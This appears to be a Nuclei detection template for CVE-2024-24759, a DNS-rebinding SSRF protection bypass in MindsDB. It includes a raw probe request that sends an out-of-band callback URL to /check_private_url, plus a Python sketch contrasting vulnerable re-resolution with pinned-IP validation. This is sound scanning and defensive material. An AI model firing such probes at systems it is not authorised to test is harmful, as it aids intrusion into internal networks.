Vulnerability Description
Detects a DNS rebinding vulnerability in MindsDB that allows bypass of SSRF protection. The vulnerability exists in the URL validation mechanism, where DNS resolution is performed without considering DNS rebinding attacks.
id: CVE-2024-24759

info:
  name: MindsDB - DNS Rebinding SSRF Protection Bypass
  author: Lee Changhyun(eeche)
  severity: high
  description: |
    Detects DNS rebinding vulnerability that allows bypass of SSRF protection. The vulnerability exists in the URL validation mechanism where DNS resolution is performed without considering DNS rebinding attacks.
  impact: |
    SSRF Protection Bypass via DNS Rebinding
  remediation: |
    Upgrade to mindsdb version 23.12.4.2 or later
  reference:
    - https://github.com/advisories/GHSA-4jcv-vp96-94xr
    - https://nvd.nist.gov/vuln/detail/CVE-2024-24759
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2024-24759
    cwe-id: CWE-918
    epss-score: 0.52367
    epss-percentile: 0.97849
    cpe: cpe:2.3:a:mindsdb:mindsdb:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mindsdb
    product: mindsdb
    shodan-query: title:"mindsdb"
  tags: cve,cve2024,mindsdb,ssrf,dns-rebinding,oast

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "mindsdb")'
        internal: true

  - raw:
      - |
        GET /check_private_url?url=https://{{interactsh-url}}/ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4b0a00483046022100b01880aadce288cd4b9f710f11a314c2bb728427f268e31fdb1128a01854e1b70221008f4f81fecbf73e7cf4a59a7e7f0a39857fde9cbb121124291787f7511ad4fdb0:922c64590222798bb761d5b6d8e72950
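
The check-then-use gap that a DNS rebinding bypass relies on, shown as an added illustration of the general pattern (not MindsDB's code or its patch, and not part of the template). A constructed resolver stands in for DNS; the hostname, addresses and function names are assumptions.

```python
import ipaddress


class RebindingResolver:
    """Constructed stand-in for DNS: the first lookup returns one address,
    every later lookup returns another (a short-TTL rebinding record)."""

    def __init__(self, first, later):
        self.first, self.later, self.lookups = first, later, 0

    def resolve(self, host):
        self.lookups += 1
        return self.first if self.lookups == 1 else self.later


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def connect_ip_check_then_use(host, resolver):
    """Weak pattern: the check resolves the name, then the HTTP client
    resolves it again, so the two steps can see different answers."""
    if is_internal(resolver.resolve(host)):   # lookup 1: validation only
        raise ValueError("blocked: internal address")
    return resolver.resolve(host)             # lookup 2: address actually dialed


def connect_ip_pinned(host, resolver):
    """Hardened pattern: resolve once, validate that answer, dial that exact
    IP (the original name is still sent as Host/SNI), never re-resolve."""
    ip = resolver.resolve(host)
    if is_internal(ip):
        raise ValueError("blocked: internal address")
    return ip


def demo():
    host = "rebind.example.test"              # constructed hostname
    public, internal = "93.184.216.34", "169.254.169.254"  # constructed answers
    weak = connect_ip_check_then_use(host, RebindingResolver(public, internal))
    pinned = connect_ip_pinned(host, RebindingResolver(public, internal))
    try:
        connect_ip_pinned(host, RebindingResolver(internal, public))
        rejected = False
    except ValueError:
        rejected = True
    return weak, pinned, rejected
```

`demo()` returns the address each pattern would connect to: the weak pattern passes validation yet dials the internal address, while the pinned pattern dials only the address it validated.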